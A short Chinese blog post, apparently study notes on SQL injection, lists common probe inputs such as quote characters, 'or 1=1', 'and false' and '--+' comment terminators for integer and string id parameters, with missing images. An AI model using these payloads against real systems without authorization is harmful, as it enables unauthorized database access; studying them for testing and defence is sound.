sql注入学习(二)---常用的注入字符

2017-01-01 10:46

常用的注入输入:

Paste_Image.png

如下查询

  • id为int
select * from table_name where id=23

那么id可以输入下面这些内容:

23' 
'
23 or 1=1
23 and 1=1
23 and false
23 and true
23--+
23 and true--+
  • id为字符
select * from table_name where id='23'

可以如下注入

23' 
23' or '1'='1
23' and '1'='1  
23' and false--+    
23' and true--+ 
  • 其他注入可以自由把握

下面是个整体的比较,id为整型时,可能出现的情况

Paste_Image.png